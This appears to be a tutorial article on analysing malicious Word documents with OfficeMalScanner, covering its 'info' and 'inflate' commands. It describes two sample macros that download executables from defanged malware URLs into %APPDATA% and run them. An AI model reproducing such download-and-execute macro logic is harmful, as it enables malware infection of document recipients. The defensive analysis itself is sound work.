Spreading of malware through malicious documents is not new but considering how malware authors use different techniques has become challenging for malware analysts to identify the patterns, extract, and understand the malicious code. In this article series, we will learn about the two primary document types through which the malicious documents spread, i.e., Microsoft Documents and PDF files. We will also see the structure of these documents as that needs to be understood first to know what all the different properties/artifacts are used by malware authors to embed their code. We will also see various tools that can be used to extract all such information and how to interpret the output of these tools. So, let’s start.

First, let’s analyze Microsoft Documents.

Microsoft Office Applications

Microsoft office applications such as Word, Excel and PowerPoint all have a history of being exploited by malicious authors from time to time. Since these applications are often used by enterprise users and end users, malicious authors target these documents to infect more users and extract valuable information from them.

These Microsoft applications are exploited by malicious authors either by embedding shellcode in the document which is executed by exploiting a vulnerability or by macro code embedded as a macro in the document which in turn is executed when the user clicks ‘ok.’

It must be noted that although all modern versions of Microsoft office support VBA macro, they are disabled by default. The user must explicitly enable the macros. One can also get the sense from this that this type of attacks needs the user’s involvement to get infected. Malware Author’s will ide the contents of a document until the user clicks on “Enable Content.” As soon as the user clicks on “Enable Content,” he might see some known information in the document but if the document is malicious then at the malicious backend code will start running.

To analyze such malicious documents, a very popular toolkit known as OfficeMalScanner is available. This is a great utility as it removes the dependency on Microsoft Office on the system. In the below section we will see how we can use the OfficeMalScanner to analyze such malicious documents.

OfficeMalScanner extracts the VBA code embedded in the macro. Supply the info parameter as

OfficeMalScanner sample.doc info

and OfficeMalScanner creates a directory and dump its findings into that directory.

In this example. It dumps the parsed contents of sample.doc in <filename>.macros such as the one below.

Open the Avira file and below content can be seen

As soon as the document is opened ad user enabled macros, Auto_Open() will be executed. In this function, OberonSoftware is called and then calls the function Mordedor. If we look at the top of the script, then this function can be seen as an alias to URLDownloadToFIleA which means that the code is directing Microsoft Word to download aboki.scr file from hxxp://limitless.hints.me and save it as %APPDATA%\conhost.exe.

As we can see that with just one command of OfficeMalScanner, we were able to extract macros and then such useful information like discussed above. We will continue to see more OfficeMalScanner limitations & capabilities as we progress in this series.

As we know that starting from Office 2007, Microsoft has shifted from traditional binary format to an XML based format for better parsing of embedded objects. For this very reason, we can see that the x in all new extensions of Microsoft Office such as .docx, .pptx,.xlsx, etc. and all the contents of a file can be extracted from files using software like 7zip. For example, extracting the content of this document using 7-Zip results in below folder.

Now let’s run these new XML based word documents with OfficeMalScanner. Before we start another important point to note is that when saved with XML based formats, macros are only supported for extensions ending with m like .docm,.pptm, etc.

Ethical Hacking Training – Resources (InfoSec)

To analyze such format samples, we took the newformatsample.exe and ran the following command

OfficeMalScanner newformatsample.docm info

The reason we got above message is because OfficeMalScanner is not able to use ‘info’ parameter on these new XML based formats. Thus, use the info parameter only with legacy files.

To get around this limitation of ‘info’ command, we can use other command known as inflate command of OfficeMalScanner like below

OfficeMalScanner newformatsample.docm inflate


If OfficeMalScanner detects an embedded VBA macro code, then it places the contents in vbaProject.bin. Below is the directory structure of the whole inflate command output.

Moreover, vbaProject.bin is inside the word folder.

Now let’s run the ‘info’ command on this vbaProject.bin file.

OfficeMalScanner vbaProject.bin info

Now the command works because we were able to parse out the binary file successfully.

Below are the contents of the extracted macro file.

Let open NewMacros and see its functionality. As soon as the document is opened and the macros are enabled, function ‘h’ is called (look inside Auto_Open). Inside function ‘h,’ a shell type object is created and then it uses GET and SEND method of XMLHTTP object to download the content from hxxp:/softonic.biz/cr/20014.exe.

After that, the downloaded exe file is saved as q.com(in below snippet) in the %APPDATA%\q folder (in above snippet).

After that function ‘m’ is called which in turn executes the downloaded file.

So, in this article, we have seen some basics and initial concepts around analyzing Malicious files. In the next part of series, we will look into more complex examples and will see the methods to parse the contents from those malicious documents.